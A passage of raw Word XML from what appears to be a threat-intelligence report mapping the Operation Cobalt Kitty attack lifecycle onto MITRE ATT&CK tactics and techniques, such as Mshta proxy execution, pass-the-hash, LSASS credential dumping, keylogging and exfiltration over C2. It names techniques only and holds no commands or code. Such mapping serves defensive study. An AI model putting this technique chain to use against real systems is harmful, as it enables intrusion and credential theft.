        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hide Artifacts&gt;:Hidden Files and Directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8B7D10"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1112 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Modify Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21499C97"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E357F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1218.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E357F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E357F6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2009152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T1564.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hide Artifacts&gt;:NTFS File Attributes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177DAA9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T1550.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Pass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B068E37"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T1550.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Pass the Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558ABDA1"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T1027.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Binary Padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4699A7AC"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T1070.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:Clear Windows Event Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC257B1"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAACB7D"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T1216.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Script Proxy Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PubPrn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C4D3801"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3470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096A3DAE"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r w:rsidRPr="0064459B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0064459B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0064459B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD0258"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T1078.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Local Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DFC46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T1218.010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Regsvr32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7EACD7"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T1070.006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timestomp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FB96C86"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1056.001', 'T1003', 'T1552.002', 'T1003.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37854844"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F322EA6"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1003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OS Credential Dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133456E5"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T1552.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Unsecured Credentials&gt;:Credentials in Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F658B2"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T1003.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:LSASS Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB585C5"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1135', 'T1087.001', 'T1012', 'T1083', 'T1016', 'T1049', 'T1018', 'T1046', 'T1033', 'T1082']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9BFFF"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1135 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Share Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA73C8E"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T1087.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Local Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CADFC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1012 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Query Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF82345"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1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6DF4A5"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1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4F2AF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1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E303B72"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1018 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote System Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B654599"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1046 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272BFFD6"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1033 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0274F4"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1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4DA808"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1570', 'T1550.002', 'T1550.003', 'T1021.002', 'T1072']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01340A42"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1570 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447A472A"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T1550.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Pass the Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2208F126"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T1550.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Use Alternate Authentication Material&gt;:Pass the Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C180A68"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T1021.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SMB/Windows Admin Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51541C2F"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1072 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Software Deployment Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA2033"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1056.001', 'T1560']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F42184C"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AAF84B"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1560 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Archive Collected Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B044988"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1102', 'T1571', 'T1071.003', 'T1105', 'T1071.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E85E304"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1102 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1162C6A1"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1571 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Non-Standard Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156ACE7B"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T1071.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Mail Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7FFCCE"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003470D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7212468C"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6C0AD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0AD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42294F49" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="0059419E"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1048.003', 'T1041']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D3890C"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 xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1048.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Exfiltration Over Alternative Protocol&gt;:Exfiltration Over Unencrypted Non-C2 Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D6FEB" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="0059419E" w:rsidRDefault="0059419E" w:rsidP="0059419E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1041 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration Over C2 Channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B163AB" w14:textId="52FB6D0D" w:rsidR="0059419E" w:rsidRPr="005935F8" w:rsidRDefault="0059419E" w:rsidP="0059419E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0059419E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Impact []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A58C64" w14:textId="3BEBCA83" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="0059419E">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc153480865"/>
      <w:r>
        <w:t xml:space="preserve">T1566.001 - </w:t>
      </w:r>
      <w:r w:rsidR="006819C1">
        <w:t>Operation Cobalt Kitty Attack Lifecycle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="6207AF51" w14:textId="77777777" w:rsidR="0059419E" w:rsidRDefault="0059419E" w:rsidP="0059419E">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59419E" w:rsidRPr="002D1D50" w14:paraId="284C18C9" w14:textId="77777777" w:rsidTr="00873778">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BDDB235" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="002D1D50" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630A77CA" w14:textId="77777777" w:rsidR="0059419E" w:rsidRPr="002D1D50" w:rsidRDefault="0059419E" w:rsidP="00F63E0B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
